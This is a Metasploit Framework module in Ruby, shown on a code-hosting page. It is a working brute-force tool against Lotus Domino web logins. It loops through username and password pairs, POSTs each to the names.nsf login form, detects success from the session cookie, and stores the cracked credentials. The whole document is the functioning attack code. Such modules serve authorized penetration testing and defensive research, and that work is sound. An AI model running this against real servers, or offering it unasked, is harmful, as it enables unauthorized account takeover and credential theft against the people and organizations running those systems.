Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/lotus/lotus_domino_login.rb
28052 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::AuthBrute

9
  include Msf::Auxiliary::Report

10
  include Msf::Auxiliary::Scanner

11


12
  def initialize

13
    super(

14
      'Name' => 'Lotus Domino Brute Force Utility',

15
      'Description' => 'Lotus Domino Authentication Brute Force Utility',

16
      'Author' => 'Tiago Ferreira <tiago.ccna[at]gmail.com>',

17
      'License' => MSF_LICENSE

18
    )

19
  end

20


21
  def run_host(ip)

22
    each_user_pass { |user, pass|

23
      do_login(user, pass)

24
    }

25
  end

26


27
  def report_cred(opts)

28
    service_data = {

29
      address: opts[:ip],

30
      port: opts[:port],

31
      service_name: opts[:service_name],

32
      protocol: 'tcp',

33
      workspace_id: myworkspace_id

34
    }

35


36
    credential_data = {

37
      origin_type: :service,

38
      module_fullname: fullname,

39
      username: opts[:user],

40
      private_data: opts[:password],

41
      private_type: :password

42
    }.merge(service_data)

43


44
    login_data = {

45
      last_attempted_at: Time.now,

46
      core: create_credential(credential_data),

47
      status: Metasploit::Model::Login::Status::SUCCESSFUL,

48
      proof: opts[:proof]

49
    }.merge(service_data)

50


51
    create_credential_login(login_data)

52
  end

53


54
  def do_login(user = nil, pass = nil)

55
    post_data = "username=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&RedirectTo=%2Fnames.nsf"

56
    vprint_status("http://#{vhost}:#{rport} - Lotus Domino - Trying username:'#{user}' with password:'#{pass}'")

57


58
    begin

59
      res = send_request_cgi({

60
        'method' => 'POST',

61
        'uri' => '/names.nsf?Login',

62
        'data' => post_data,

63
      }, 20)

64


65
      if res and res.code == 302

66
        if res.get_cookies.match(/DomAuthSessId=(.*);(.*)/i)

67
          print_good("http://#{vhost}:#{rport} - Lotus Domino - SUCCESSFUL login for '#{user}' : '#{pass}'")

68
          report_cred(

69
            ip: rhost,

70
            port: rport,

71
            service_name: (ssl ? "https" : "http"),

72
            user: user,

73
            password: pass,

74
            proof: "WEBAPP=\"Lotus Domino\", VHOST=#{vhost}, COOKIE=#{res.get_cookies}"

75
          )

76
          return :next_user

77
        end

78


79
        print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized 302 response")

80
        return :abort

81


82
      elsif res.body.to_s =~ /names.nsf\?Login/

83
        vprint_error("http://#{vhost}:#{rport} - Lotus Domino - Failed to login as '#{user}'")

84
        return

85
      else

86
        print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized #{res.code} response") if res

87
        return :abort

88
      end

89
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

90
    rescue ::Timeout::Error, ::Errno::EPIPE

91
    end

92
  end

93
end

94


95